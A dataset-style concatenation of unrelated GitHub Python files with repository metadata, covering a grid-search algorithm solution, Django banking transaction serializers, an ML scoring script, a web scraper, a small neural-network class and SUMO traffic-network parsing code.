infer.infer(args.imagepath, args.modelname)
except:
print("Something BAD happened!!!")
|
Deepesh22/Crowd-Counting
|
cli.py
|
cli.py
|
py
| 482 |
python
|
en
|
code
| 0 |
github-code
|
6
|
27213329955
|
import sys
from collections import deque
dx = [-1, 1, 0, 0]
dy = [0, 0, -1, 1]
INF = 1e9
N, M = map(int, sys.stdin.readline().rstrip().split())
maps = [list(map(int, sys.stdin.readline().rstrip().split())) for _ in range(N)]
hospital_comb = []
answer = INF
def dfs(hospital_list, pick_list, idx):
if idx == len(hospital_list):
if len(pick_list) == M:
hospital_comb.append(pick_list[:])
return
pick_list.append(hospital_list[idx])
dfs(hospital_list, pick_list, idx + 1)
pick_list.pop()
dfs(hospital_list, pick_list, idx + 1)
def bfs(hospital_list):
global answer
q = deque([])
visited = [[False] * N for _ in range(N)]
time_maps = [[0] * N for _ in range(N)]
for h in hospital_list:
q.append((h[0], h[1], 0))
visited[h[0]][h[1]] = True
while q:
x, y, cnt = q.popleft()
for i in range(4):
nx, ny = x + dx[i], y + dy[i]
if 0 <= nx < N and 0 <= ny < N and not visited[nx][ny]:
if maps[nx][ny] == 0 or maps[nx][ny] == -2:
q.append((nx, ny, cnt + 1))
visited[nx][ny] = True
time_maps[nx][ny] = cnt + 1
time = 0
for i in range(N):
for j in range(N):
if maps[i][j] == 0 and time_maps[i][j] == 0:
return
if maps[i][j] == 0:
time = max(time, time_maps[i][j])
answer = min(answer, time)
hospital = []
for i in range(N):
for j in range(N):
if maps[i][j] == 2:
hospital.append((i, j))
maps[i][j] = -2
if maps[i][j] == 1:
maps[i][j] = -1
dfs(hospital, [], 0)
for i in range(len(hospital_comb)):
bfs(hospital_comb[i])
print(-1) if answer == INF else print(answer)
|
hammii/Algorithm
|
CodeTree_python/바이러스_백신.py
|
바이러스_백신.py
|
py
| 1,804 |
python
|
en
|
code
| 2 |
github-code
|
6
|
38852384412
|
from django.core import validators
from rest_framework import serializers
from django.utils.translation import gettext_lazy as _
from degvabank.apps.account.models import Account
from degvabank.apps.card.models import CreditCard
from degvabank.apps.transaction.utils import is_our_number
from .models import Transaction
class TransactionSerializer(serializers.ModelSerializer):
class Meta:
model = Transaction
fields = "__all__"
class UserTransactionSerializer(serializers.ModelSerializer):
acc = card = dst = dst_not_our = None
document_id = serializers.CharField(
write_only=True,
max_length=15,
validators=[
validators.RegexValidator(
regex=r"^[eEvVjJ]\d+$",
message=_("your document id is not well formatted"),
),
],
)
def validate_source(self, value):
user = self.context["request"].user
self.acc = user.accounts.filter(id=value, is_active=True).first()
self.card = user.credit_cards.filter(number=value, is_active=True).first()
if not (self.acc or self.card):
raise serializers.ValidationError(_("Invalid source account or card"))
return value
def validate_target(self, value):
# TODO: if value not ours: return value
if not is_our_number(value):
self.dst = value
self.dst_not_our = True
return value
dst_acc = Account.objects.filter(id=value, is_active=True).first()
dst_card = CreditCard.objects.filter(number=value, is_active=True).first()
if not (dst_acc or dst_card):
raise serializers.ValidationError(
_("Target account or card does not exists")
)
self.dst = dst_card or dst_acc
return value
def validate_document_id(self, value):
if not self.dst_not_our and self.dst and self.dst.user.document_id.lower() != str(value).lower():
raise serializers.ValidationError(
_("Target account or card is not associated with that document id")
)
return value
def validate_amount(self, value):
if self.acc and self.acc.balance < value:
raise serializers.ValidationError(_("Insufficent balance"))
if self.card and self.card.credit < value:
raise serializers.ValidationError(_("Insufficent balance"))
return value
class Meta:
model = Transaction
fields = [
"id",
"source",
"target",
"document_id",
"amount",
"type",
"status",
"reason",
"date",
]
read_only_fields = ("type", "status", "date", "id")
def create(self, validated_data):
field_names = [field.name for field in self.Meta.model._meta.get_fields()]
data = {a: b for a, b in validated_data.items() if a in field_names}
kwargs = {
"amount": data["amount"],
"reason": data["reason"],
"source": {
"number": data["source"]
},
"target": {
"number": data["target"],
"document_id": validated_data["document_id"],
}
}
return self.Meta.model.objects.create_any_transaction(**kwargs)
class TransactionCardSerializer(serializers.Serializer):
number = serializers.CharField()
security_code = serializers.CharField()
expiration_date = serializers.DateTimeField()
document_id = serializers.CharField(
required=False,
write_only=True,
max_length=15,
validators=[
validators.RegexValidator(
regex=r"^[eEvVjJ]\d+$",
message=_("your document id is not well formatted"),
),
],
)
class TransactionAccountSerializer(serializers.Serializer):
number = serializers.CharField()
document_id = serializers.CharField(
required=True,
write_only=True,
max_length=15,
validators=[
validators.RegexValidator(
regex=r"^[eEvVjJ]\d+$",
message=_("your document id is not well formatted"),
),
],
)
class ForeignTransactionSerializer(serializers.ModelSerializer):
acc_src = TransactionAccountSerializer(required=False)
acc_dst = TransactionAccountSerializer(required=False)
card_src = TransactionCardSerializer(required=False)
card_dst = TransactionCardSerializer(required=False)
class Meta:
model = Transaction
fields = [
"id",
"acc_src",
"acc_dst",
"card_src",
"card_dst",
"amount",
"type",
"status",
"reason",
"date",
]
read_only_fields = ("type", "status", "date", "id")
def create(self, validated_data):
field_names = [field.name for field in self.Meta.model._meta.get_fields()]
data = {a: b for a, b in validated_data.items() if a in field_names}
kwargs = {
"amount": data["amount"],
"reason": data["reason"],
"source": validated_data.get("acc_src") or validated_data.get("card_src"),
"target": validated_data.get("acc_dst") or validated_data.get("card_dst")
}
return self.Meta.model.objects.create_any_transaction(from_foreign=True, **kwargs)
|
Vixx-X/DEGVABank-backend
|
degvabank/degvabank/apps/transaction/serializers.py
|
serializers.py
|
py
| 5,507 |
python
|
en
|
code
| 0 |
github-code
|
6
|
35721608965
|
import os
import json
import numpy as np
import preprocessing as preprocessing
from tensorflow import keras
def init():
global model
global vocab
global max_len
model = keras.models.load_model(os.path.join(os.getenv('AZUREML_MODEL_DIR'), 'model'), compile=False)
with open(os.path.join(os.getenv('AZUREML_MODEL_DIR'), 'model', 'vocab.json')) as json_file:
vocab = json.load(json_file)
with open(os.path.join(os.getenv('AZUREML_MODEL_DIR'), 'model', 'params.json')) as json_file:
params = json.load(json_file)
max_len = params['max_len']
def run(raw_data):
tweets = np.array(json.loads(raw_data)["data"])
processed_tweets = preprocessing.process_tweets(tweets, vocab, max_len)
result = model.predict(processed_tweets).ravel()
return result.tolist()
|
luisespriella9/disastersLocator
|
src/scoring.py
|
scoring.py
|
py
| 809 |
python
|
en
|
code
| 0 |
github-code
|
6
|
29520352035
|
import requests
from bs4 import BeautifulSoup as bs
import csv
from itertools import chain
def get_urls():
"""
Skilar lista sem inniheldur slóðir á allar undirsíður
með kosningaúrslitum
"""
main_page = requests.get("http://www.kosningastofnun.in/")
page_soup = bs(main_page.content, "html.parser")
urls = [title.a.get("href") for title in page_soup.find_all(class_="blog-post-title")]
return urls
def scrape(urls):
"""
Tekur inn lista af slóðum og skrapar fyrstu töfluna sem finnst á hverri slóð.
Skilar lista af dicts þar sem hvert dict er með töfluhausa sem lykla og
töfluhólf sem gildi
"""
all_dicts = []
for url in urls:
elections_page = requests.get(url)
elections_soup = bs(elections_page.content, "html.parser")
# Finnum alla töfluhausa og setjum í lista:
headers = [header.string.strip() for header in elections_soup.find_all("th")]
# Förum svo í gegnum hverja röð og setjum gildin í lista:
for row in elections_soup.find_all("tr"):
results = [cell.string.strip() for cell in row.find_all("td")]
# Athugum hvort þetta er gild niðurstöðulína, annars gerum við ekkert:
if results:
# Nú getum við sett þessar niðurstöður í dict með hausunum:
elections = dict(zip(headers, results))
# Ef dagsetning var ekki með í þessum niðurstöðum þurfum við
# að skrapa hana úr titlinum og setja inn í dictið:
if "Dagsetning" not in elections:
full_title = elections_soup.h2.a.string
# Splittum titlinum á fyrsta bili og tökum seinni hlutann:
elections["Dagsetning"] = full_title.split(" ", 1)[1]
# Og setjum svo dictið í stóra listann:
all_dicts.append(elections)
return all_dicts
def save_csv(list_of_dicts):
"""
Tekur inn lista af dicts og skrifar út í CSV-skrána "kosningar.csv" í möppunni
sem skriftan er keyrð úr
"""
with open("kosningar.csv", "w") as csv_file:
fieldnames = set([key for key in chain(*list_of_dicts)])
# Röðum dálkaheitunum, fyrst í stafrófsröð og svo aftur til að fá
# dagsetningu fremst (ekki nauðsynlegt):
fieldnames = sorted(fieldnames)
fieldnames = sorted(fieldnames, key=lambda x: x == "Dagsetning", reverse=True)
writer = csv.DictWriter(csv_file, fieldnames)
writer.writeheader()
writer.writerows(list_of_dicts)
# Keyrum heila klabbið:
if __name__ == "__main__":
save_csv(scrape(get_urls()))
|
flother/data-acq-viz
|
2018/kosningaskrapari-lausn.py
|
kosningaskrapari-lausn.py
|
py
| 2,713 |
python
|
is
|
code
| 1 |
github-code
|
6
|
72588123388
|
from numpy.testing import *
import numpy
import numpy.random
from adolc import *
from adolc.cgraph import *
from adolc.tangent import *
class TangentOperationsTests(TestCase):
def test_constructor(self):
t1 = Tangent(1,2)
t2 = Tangent(adouble(1),2)
def test_float_tangent_float_tangent(self):
tx = Tangent(2.,3.)
ty = Tangent(5.,7.)
tz = tx + ty
assert_array_almost_equal([tz.x,tz.xdot], [2+5, 3+7])
tz = tx - ty
assert_array_almost_equal([tz.x,tz.xdot], [2-5, 3-7])
tz = tx * ty
assert_array_almost_equal([tz.x,tz.xdot], [2*5, 3*5 + 2*7])
tz = tx / ty
assert_array_almost_equal([tz.x,tz.xdot], [2./5., (3*5 - 2*7.)/5**2])
def test_double_tangent_adouble(self):
tx = Tangent(2,3)
ay = adouble(5)
tz = tx + ay
assert_array_almost_equal([tz.x.val,tz.xdot], [2+5, 3])
tz = tx * ay
assert_array_almost_equal([tz.x.val,tz.xdot.val], [2*5, 3*5])
def test_adouble_tangent_adouble_addition(self):
tx = Tangent(adouble(2), 1)
ty = Tangent(adouble(3), 0)
tz = tx + ty
assert_array_almost_equal([tz.x.val,tz.xdot], [5, 1])
class SemiImplicitOdeLhsTest(TestCase):
"""
This is a test example taken from PYSOLVIND
In chemical engineering, semi-implicit ODEs of the type::
d/dt g(t,y(t)) = f(t,y(t))
y(0) = y_0
have to be solved. PYSOLVIND requires a function afcn that computes::
d/dy g(t,y) d/dt y
where d/dt y = xdd
y = xd
"""
def test_differentiation_of_gfcn(self):
def gfcn(a):
print('called gfcn')
ty = [Tangent(a.xd[0], a.xdd[0]),Tangent(a.xd[1], a.xdd[1]), Tangent(a.xd[2], a.xdd[2])]
tlhs = [ty[0] * ty[2], ty[1] * ty[2], ty[2]]
a.lhs[0] = tlhs[0].xdot
a.lhs[1] = tlhs[1].xdot
a.lhs[2] = tlhs[2].xdot
def afcn(a):
a.lhs[0] = a.xd[2] * a.xdd[0] + a.xd[0] * a.xdd[2]
a.lhs[1] = a.xd[2] * a.xdd[1] + a.xd[1] * a.xdd[2]
a.lhs[2] = a.xdd[2]
class Args:
def __init__(self):
self.xd = numpy.random.rand(3)
self.xdd = numpy.random.rand(3)
self.lhs = numpy.zeros(3)
args = Args()
gfcn(args)
result1 = args.lhs.copy()
afcn(args)
result2 = args.lhs.copy()
assert_array_almost_equal(result1, result2)
# class FunctionExampleTests(TestCase):
# def test_utps_on_jacobian(self):
# def f(x,p):
# print p
# print p[0] + p[1]
# return (p[0] + p[1]) * x**2
# AP = AdolcProgram()
# AP.trace_on(1)
# ax = adouble(3.)
# ap = adouble([5.,7.])
# AP.independent(ax)
# AP.independent(ap)
# tp = [Tangent(ap[0],1),Tangent(ap[1],0)]
# tf = f(ax,tp)
# aJ = tf.xdot
# print aJ
# AP.dependent(aJ)
# AP.trace_off()
# g = gradient(1, [1,2,3])
# print g
if __name__ == '__main__':
try:
import nose
except:
print('Please install nose for unit testing')
nose.runmodule()
|
b45ch1/pyadolc
|
adolc/tests/test_tangent.py
|
test_tangent.py
|
py
| 3,503 |
python
|
en
|
code
| 43 |
github-code
|
6
|
29875084962
|
## ~~~~~~~~~~~~~~~~~~
# Deep Willy Network
## ~~~~~~~~~~~~~~~~~~
import numpy as np, json, sys, os
sys.path.append(os.path.dirname(__file__))
from willies import *
class DeepWilly(object):
_willy_classes = {'connected': ConnectedWilly,
'dropout': DropoutWilly,
'convolutional': ConvolutionalWilly,
'pooling': PoolingWilly,
'stacking': StackingWilly}
def __init__(self, cost_func = 'cross entropy'):
self.willies = []
self.n_willies = 0
self.cost_func = cost_func
if cost_func == 'cross entropy':
self.cost = lambda a, y: -np.mean(y * np.log(a + (a == 0)) + (1-y) * np.log(1-a + (a == 1)))
self.dcost = lambda a, y: (1/a.shape[0]) * (a - y) / (a * (1 - a) + 1e-99)
elif cost_func == 'quadratic':
self.cost = lambda a, y: 0.5 * np.mean((a - y)**2)
self.dcost = lambda a, y: (1/a.shape[0]) * (a - y)
else:
raise Exception('Unsupported cost function: ' + cost_func)
def add(self, willy):
''' Add a willy to the network and set it up based on the previous willy's output (if not the first one). '''
if len(self.willies) == 0:
if not willy.is_set_up:
raise Exception('Input shape or number must be provided to first Willy.')
else:
willy.set_up(self.willies[-1].out_shape)
self.willies.append(willy)
self.n_willies += 1
def forward_prop(self, X):
''' Forward propagates X through the willies. '''
for willy in self.willies:
X = willy.forward_prop(X)
return X
def backward_prop(self, X, y,
learn_rate, mom_rate, reg_rate):
''' Backward propagates errors while simultaneously updating weights in each layer. '''
# Output layer dC/da
batch_size = X.shape[0]
dA = self.dcost(self.willies[-1].A, y)
# Backpropagate, updating weights
XA = [X] + [willy.A for willy in self.willies[:-1]]
XA = XA[::-1]
for w, willy in enumerate(reversed(self.willies)):
willy.update_weights(dA, XA[w],
learn_rate, mom_rate, reg_rate)
dA = willy.backward_prop()
@staticmethod
def get_batches(X, y, batch_size):
''' Shuffles training data and gets random batch of desired size. '''
if batch_size == -1 or batch_size >= X.shape[0]:
return [X], [y]
# Shuffle data
shuffled_indices = np.random.permutation(len(X))
shuffled_X = X[shuffled_indices]
shuffled_y = y[shuffled_indices]
# Get batch of desired size
X_batches = []
y_batches = []
for i in range(X.shape[0]//batch_size):
X_batches.append(shuffled_X[int(batch_size*i):int(batch_size*(i+1))])
y_batches.append(shuffled_y[int(batch_size*i):int(batch_size*(i+1))])
return X_batches, y_batches
def train(self, X, y,
num_iterations, batch_size,
learn_rate, reg_rate, mom_rate = 0,
verbose = False):
''' Builds network, trains using given data and training parameters. '''
# Change dtypes
X = X.astype(np.float32)
y = y.astype(np.float32)
# Initialise momenta to 0
for willy in self.willies:
willy.reset_momenta()
# Train network
for iteration in range(num_iterations):
# Get batches:
X_batches, y_batches = self.get_batches(X, y, batch_size)
for batchX, batchy in zip(X_batches, y_batches):
# Forward propagate
self.forward_prop(batchX)
# Backward propagate & update weights
self.backward_prop(batchX, batchy,
learn_rate, mom_rate, reg_rate)
# Print progress
if verbose:
if iteration % verbose == 0:
print("Training cost on last batch: ", self.cost(self.willies[-1].A, batchy))
def predict(self, X, pred_type = 'as is'):
self.yhat = self.forward_prop(X)
if pred_type == 'binary':
self.yhat = 1 * (self.yhat > 0.5)
elif pred_type == 'argmax':
self.yhat = np.argmax(self.yhat, axis = 1).reshape(-1, 1)
else:
assert pred_type == 'as is', \
"Provided argument pred_type (" + pred_type + ") not supported."
return self.yhat
def accuracy(self, X, y, pred_type = 'as is'):
''' Gets accuracy of predictions. '''
return np.mean(self.predict(X, pred_type) == y)
def save(self, filename):
''' Saves deep willy to file \filename. '''
willy_data = []
for willy in self.willies:
willy_data.append(willy.save())
data = {'cost': self.cost_func,
'willies': willy_data}
file = open(filename, "w")
json.dump(data, file)
file.close()
@classmethod
def load(cls, filename):
''' Loads deep willy from file \filename. '''
file = open(filename, "r")
data = json.load(file)
file.close()
deep_willy = cls(data['cost_func'])
for willy in data['willies']:
willy_class = DeepWilly._willy_classes[willy['willy']]
deep_willy.add(willy_class.load(willy))
return deep_willy
def copy(self):
''' Replicates this deep willy using its attributes. '''
copy = DeepWilly(cost_func = self.cost_func)
for willy in self.willies:
copy.willies.append(willy.copy())
copy.n_willies += 1
return copy
|
gavarela/willyai
|
willyai/deepWilly.py
|
deepWilly.py
|
py
| 6,171 |
python
|
en
|
code
| 0 |
github-code
|
6
|
50051591
|
from typing import *
# 一个较长的字符串肯定不会是一个较短字符串的子序列,那么只需要从长到短判断,每一个字符串是否为其他长度不小于它的字符串的子序列就行了
# When we add a letter Y to our candidate longest uncommon subsequence answer of X, it only makes it strictly harder to find a common subsequence.
# Thus our candidate longest uncommon subsequences will be chosen from the group of words itself.
class Solution:
def findLUSlength(self, strs: List[str]) -> int:
def isSubSeq(w1, w2):
if len(w1) > len(w2):
return False
l, r = 0, 0
while l < len(w1) and r < len(w2):
if w1[l] == w2[r]:
l += 1
r += 1
return l == len(w1)
strs.sort(key = len, reverse = True)
for i, w1 in enumerate(strs):
if all(not isSubSeq(w1, w2) for j, w2 in enumerate(strs) if i != j):
return len(w1)
return -1
if __name__ == "__main__":
s = Solution()
assert s.findLUSlength(["aba","cdc","eae"]) == 3
assert s.findLUSlength(["aaa","aaa","aa"]) == -1
|
code-cp/leetcode
|
solutions/522/main.py
|
main.py
|
py
| 1,198 |
python
|
en
|
code
| 0 |
github-code
|
6
|
44632376656
|
# coding:utf-8
from bs4 import BeautifulSoup
import urllib.request as req
import sqlite3
from contextlib import closing
url="http://su-gi-rx.com/2017/07/16/python_4/"
dbname='database.db'
conn=sqlite3.connect(dbname)
c=conn.cursor()
table_name = 'test'
def get_html():
#urlopen()でデータ取得
res=req.urlopen(url)
#BeautifulSoup()で解析
soup=BeautifulSoup(res,'html.parser')
#任意のデータを抽出
title1=soup.find("h1").string
#print("title=",title1)
p_list=soup.find_all("p")
#print("text=",p_list)
return [(str(title1),str(p_list))]
def create_table(tname):
#executeメソッドでSOL文を実行する
create_table='''create table if NOT EXISTS {0} (title varchar(64),p_list varchar(32))'''.format(tname)
c.execute(create_table)
def insert_data(tname,data):
insert_sql='insert into {0} (title,p_list) values(?,?)'.format(tname)
c.executemany(insert_sql,test)
conn.commit()
if __name__=='__main__':
create_table(table_name)
test=get_html()
insert_data(table_name,test)
select_sql = 'select * from {0}'.format(table_name)
for row in c.execute(select_sql):
print(row)
conn.close()
|
riku-nagisa/python1
|
html_ren.py
|
html_ren.py
|
py
| 1,261 |
python
|
en
|
code
| 0 |
github-code
|
6
|
34183765672
|
def convert_rank(num):
rank = 6 - num + 1
if rank >= 6 :
rank = 6
return rank
def solution(lottos, win_nums):
match, zero = 0, 0
for num in lottos :
if not num :
zero += 1
if num in win_nums:
match += 1
return [convert_rank(match+zero), convert_rank(match)]
test_case = [
[[44, 1, 0, 0, 31, 25], [31, 10, 45, 1, 6, 19]],
[[0, 0, 0, 0, 0, 0], [38, 19, 20, 40, 15, 25]],
[[45, 4, 35, 20, 3, 9], [20, 9, 3, 45, 4, 35]]
]
for lottos, win_nums in test_case:
print(solution(lottos, win_nums))
|
study-for-interview/algorithm-study
|
hanjo/개인용/programmers/완전탐색/L1_로또의최고순위와최저순위/solution.py
|
solution.py
|
py
| 578 |
python
|
en
|
code
| 8 |
github-code
|
6
|
25018521367
|
model_cfg = {
"high_level_parameters": { # parameters common to all models, e.g. how much data to get, debugging parameters etc.
"data_period": ("2020-01-01", "2023-01-01"),
"parameter2": 60,
"parameter3": 20,
},
"low_level_parameters": {
"model1_parameters": {
"learning_rate": 1,
"hidden_layers": 2,
},
"model2_parameters": {
"ewma_alpha": 0.05,
"sigma": 3,
},
},
}
|
hviidhenrik/my-sample-data-science-structure
|
core/config/model_config.py
|
model_config.py
|
py
| 488 |
python
|
en
|
code
| 0 |
github-code
|
6
|
73995685309
|
# from game import random
# from game import np
from game import Game
from agent import Agent
import pandas as pd
class GameAnalysis:
def __init__(self, imported_game: Game):
self.game = imported_game
def print_data(self):
rows = []
for rob in self.game.robots:
rows.append([rob.name, rob.logs["food_found"]])
robdf = pd.DataFrame(rows, columns=["name", "food found"]).set_index(["name"])
return robdf
@staticmethod
def vocab_to_df(rob: Agent):
rows = []
columns = [f"{rob.name}_input", f"{rob.name}_action", f"{rob.name}_features", f"{rob.name}_inertia",
f"{rob.name}_mistakes"]
for word, action_dict in rob.vocab.items():
for action, action_data in action_dict.items():
row = [str(word), str(action), str(action_data[0]), action_data[1][0], action_data[1][1]]
rows.append(row)
return pd.DataFrame(rows, columns=columns).set_index([f"{rob.name}_input"])
def print_vocabs(self):
for rob in self.game.robots:
df = self.vocab_to_df(rob)
if "merged_df" not in locals():
merged_df = df
else:
merged_df = merged_df.join(df, how="outer")
return merged_df
def print_vocab_chain(self, requester: Agent, fetcher: Agent):
dfr = self.vocab_to_df(requester).reset_index()
dff = self.vocab_to_df(fetcher).reset_index()
return pd.merge(dfr, dff, left_on="A_action", right_on="B_input", how="outer")
# def plot_robot_paths(self, l_slice=None, r_slice=None, reverse=True):
# fig, ax = plt.subplots()
# empty_plot = True
# for rob in self.game.robots:
# col = (np.random.random(), np.random.random(), np.random.random())
# if l_slice and r_slice:
# paths_to_plot = rob.logs["taken_paths"][l_slice:r_slice]
# elif l_slice or r_slice:
# paths_to_plot = rob.logs["taken_paths"][l_slice:]
# else:
# paths_to_plot = rob.logs["taken_paths"]
# if reverse:
# paths_to_plot.reverse()
# for path in paths_to_plot:
# final_location = path[-1]
# unzipped = self.unzip_locations(path)
# x = unzipped[0]
# y = unzipped[1]
# # if self.test_for_movement(x, y):
# # empty_plot = False
# # touching_food = False
# # for food_type in self.game.food_types:
# # if self.game.maze.is_player_colliding_with_food(final_location,food_type):
# # touching_food = True
# # print(touching_food)
# ax.plot(x, y, c=col)
# if not empty_plot:
# for food_type in self.game.food_types:
# ax.plot(*food_type[1], 'o')
# ax.plot(*food_type[1], 'o', markersize=int(self.game.close_enough * 12))
# plt.xlim([-self.game.arena_size, self.game.arena_size])
# plt.ylim([-self.game.arena_size, self.game.arena_size])
# plt.show()
# else:
# plt.close()
# @staticmethod
# def test_for_movement(x, y):
# if math.isclose(np.average(x), x[0]) and math.isclose(np.average(y), y[0]):
# return False
# return True
def show_instructions(self):
for rob in self.game.robots:
if rob.role == "fetcher":
df = pd.DataFrame(rob.logs["given_sentences"])
return df
# @staticmethod
# def unzip_locations(entries):
# x = []
# y = []
# for entry in entries:
# x.append(entry[0])
# y.append(entry[1])
# return x, y
|
Jayordo/thymio_aseba_install
|
lang_game_2/game_analysis.py
|
game_analysis.py
|
py
| 3,884 |
python
|
en
|
code
| 0 |
github-code
|
6
|
6771398570
|
# -*- coding: utf-8 -*-
# Define your item pipelines here
#
# Don't forget to add your pipeline to the ITEM_PIPELINES setting
# See: http://doc.scrapy.org/en/latest/topics/item-pipeline.html
import pymysql
class ProxyPoolCrawlerPipeline(object):
def process_item(self, item, spider):
return item
# 存储到mysql数据库
class ProxyPoolCrawler2mysql(object):
# # 测试ip是否有效,有效再插入数据库
# def test_alive(proxy):
# http_url = "http://www.baidu.com"
# proxy_url = "http://{0}".format(proxy)
# try:
# proxy_dict = {
# "http": proxy_url,
# }
# response = requests.get(http_url, proxies=proxy_dict, timeout=5)
# except Exception as e:
# # print("invalid ip and port")
# return False
# else:
# code = response.status_code
# if code >= 200 and code < 300:
# # print("effective ip")
# return True
# else:
# # print("invalid ip and port")
# return False
def process_item(self, item, spider):
address = item['address']
connection = pymysql.connect(
host='localhost', # 连接的是本地数据库
user='root', # 自己的mysql用户名
passwd='', # 自己的密码
db='proxypool', # 数据库的名字
charset='utf8mb4', # 默认的编码方式:
cursorclass=pymysql.cursors.DictCursor)
try:
with connection.cursor() as cursor:
# 创建更新值的sql语句
sql = """INSERT INTO proxy(address)
VALUES (%s)"""
# 执行sql语句
# excute 的第二个参数可以将sql缺省语句补全,一般以元组的格式
cursor.execute(
sql, (address))
# 提交本次插入的记录
connection.commit()
finally:
# 关闭连接
connection.close()
return item
|
ShawnRong/proxy-pool-crawler
|
proxy_pool_crawler/pipelines.py
|
pipelines.py
|
py
| 2,136 |
python
|
en
|
code
| 0 |
github-code
|
6
|
2721248561
|
import copy, random, datetime
suppliesDataSets = [
[
{
"labels": [], #food
"data": []
},
{
"labels": [], #drink
"data": []
},
{
"labels": [], #medicine
"data": []
}
]
]
now = datetime.datetime.now()
for i in range(3):
for j in range(42):
t_ = (now + datetime.timedelta(days=-j)).strftime('%Y-%m-%d')
suppliesDataSets[0][i]["labels"].append(t_)
k = random.randint(0, 200)
suppliesDataSets[0][i]["data"].append(k)
for i in range(8):
cloned_ = copy.deepcopy(suppliesDataSets[0])
suppliesDataSets.append(cloned_)
|
e1833-tomohiro/Kadai
|
backend/store.py
|
store.py
|
py
| 680 |
python
|
en
|
code
| 0 |
github-code
|
6
|
8384623961
|
from __future__ import print_function
from __future__ import absolute_import
import sys
import math
import heapq
import gzip
import warnings
from xml.sax import handler, parse
from copy import copy
from collections import defaultdict
from itertools import chain
import sumolib
from . import lane, edge, netshiftadaptor, node, connection, roundabout # noqa
from .connection import Connection
class TLS:
"""Traffic Light Signal for a sumo network"""
def __init__(self, id):
self._id = id
self._connections = []
self._maxConnectionNo = -1
self._programs = {}
def addConnection(self, inLane, outLane, linkNo):
self._connections.append([inLane, outLane, linkNo])
if linkNo > self._maxConnectionNo:
self._maxConnectionNo = linkNo
def getConnections(self):
return self._connections
def getID(self):
return self._id
def getLinks(self):
links = {}
for the_connection in self._connections:
if the_connection[2] not in links:
links[the_connection[2]] = []
links[the_connection[2]].append(the_connection)
return links
def getEdges(self):
edges = set()
for c in self._connections:
edges.add(c[0].getEdge())
return edges
def addProgram(self, program):
self._programs[program._id] = program
def removePrograms(self):
self._programs.clear()
def toXML(self):
ret = ""
for p in self._programs:
ret = ret + self._programs[p].toXML(self._id)
return ret
def getPrograms(self):
return self._programs
class Phase:
def __init__(self, duration, state, minDur=-1, maxDur=-1, next=None, name=""):
self.duration = duration
self.state = state
self.minDur = minDur # minimum duration (only for actuated tls)
self.maxDur = maxDur # maximum duration (only for actuated tls)
self.next = [] if next is None else next
self.name = name
def __repr__(self):
name = "" if self.name == "" else ", name='%s'" % self.name
next = "" if len(self.next) == 0 else ", next='%s'" % self.next
return ("Phase(duration=%s, state='%s', minDur=%s, maxDur=%s%s%s" %
(self.duration, self.state, self.minDur, self.maxDur, name, next))
class TLSProgram:
def __init__(self, id, offset, type):
self._id = id
self._type = type
self._offset = offset
self._phases = []
self._params = {}
def addPhase(self, state, duration, minDur=-1, maxDur=-1, next=None, name=""):
self._phases.append(Phase(duration, state, minDur, maxDur, next, name))
def toXML(self, tlsID):
ret = ' <tlLogic id="%s" type="%s" programID="%s" offset="%s">\n' % (
tlsID, self._type, self._id, self._offset)
for p in self._phases:
minDur = '' if p.minDur < 0 else ' minDur="%s"' % p.minDur
maxDur = '' if p.maxDur < 0 else ' maxDur="%s"' % p.maxDur
name = '' if p.name == '' else ' name="%s"' % p.name
next = '' if len(p.next) == 0 else ' next="%s"' % ' '.join(map(str, p.next))
ret += ' <phase duration="%s" state="%s"%s%s%s%s/>\n' % (
p.duration, p.state, minDur, maxDur, name, next)
for k, v in self._params.items():
ret += ' <param key="%s" value="%s"/>\n' % (k, v)
ret += ' </tlLogic>\n'
return ret
def getPhases(self):
return self._phases
def getType(self):
return self._type
def setParam(self, key, value):
self._params[key] = value
def getParam(self, key, default=None):
return self._params.get(key, default)
def getParams(self):
return self._params
class Net:
"""The whole sumo network."""
def __init__(self):
self._location = {}
self._id2node = {}
self._id2edge = {}
self._crossings_and_walkingAreas = set()
self._macroConnectors = set()
self._id2tls = {}
self._nodes = []
self._edges = []
self._tlss = []
self._ranges = [[10000, -10000], [10000, -10000]]
self._roundabouts = []
self._rtreeEdges = None
self._rtreeLanes = None
self._allLanes = []
self._origIdx = None
self._proj = None
self.hasInternal = False
# store dijsktra heap for reuse if the same origin is used repeatedly
self._shortestPathCache = None
def setLocation(self, netOffset, convBoundary, origBoundary, projParameter):
self._location["netOffset"] = netOffset
self._location["convBoundary"] = convBoundary
self._location["origBoundary"] = origBoundary
self._location["projParameter"] = projParameter
def addNode(self, id, type=None, coord=None, incLanes=None, intLanes=None):
if id is None:
return None
if id not in self._id2node:
n = node.Node(id, type, coord, incLanes, intLanes)
self._nodes.append(n)
self._id2node[id] = n
self.setAdditionalNodeInfo(
self._id2node[id], type, coord, incLanes, intLanes)
return self._id2node[id]
def setAdditionalNodeInfo(self, node, type, coord, incLanes, intLanes=None):
if coord is not None and node._coord is None:
node._coord = coord
self._ranges[0][0] = min(self._ranges[0][0], coord[0])
self._ranges[0][1] = max(self._ranges[0][1], coord[0])
self._ranges[1][0] = min(self._ranges[1][0], coord[1])
self._ranges[1][1] = max(self._ranges[1][1], coord[1])
if incLanes is not None and node._incLanes is None:
node._incLanes = incLanes
if intLanes is not None and node._intLanes is None:
node._intLanes = intLanes
if type is not None and node._type is None:
node._type = type
def addEdge(self, id, fromID, toID, prio, function, name, edgeType=''):
if id not in self._id2edge:
fromN = self.addNode(fromID)
toN = self.addNode(toID)
e = edge.Edge(id, fromN, toN, prio, function, name, edgeType)
self._edges.append(e)
self._id2edge[id] = e
if function:
self.hasInternal = True
return self._id2edge[id]
def addLane(self, edge, speed, length, width, allow=None, disallow=None):
return lane.Lane(edge, speed, length, width, allow, disallow)
def addRoundabout(self, nodes, edges=None):
r = roundabout.Roundabout(nodes, edges)
self._roundabouts.append(r)
return r
def addConnection(self, fromEdge, toEdge, fromlane, tolane, direction, tls, tllink, state, viaLaneID=None):
conn = connection.Connection(
fromEdge, toEdge, fromlane, tolane, direction, tls, tllink, state, viaLaneID)
fromEdge.addOutgoing(conn)
fromlane.addOutgoing(conn)
toEdge._addIncoming(conn)
if viaLaneID:
try:
# internal lanes are only available when building with option withInternal=True
viaLane = self.getLane(viaLaneID)
viaEdge = viaLane.getEdge()
viaEdge._addIncoming(connection.Connection(
fromEdge, viaEdge, fromlane, viaLane, direction, tls,
tllink, state, ''))
except Exception:
pass
return conn
def getEdges(self, withInternal=True):
if not withInternal:
return [e for e in self._edges if e.getFunction() == '']
else:
return self._edges
def getRoundabouts(self):
return self._roundabouts
def hasEdge(self, id):
return id in self._id2edge
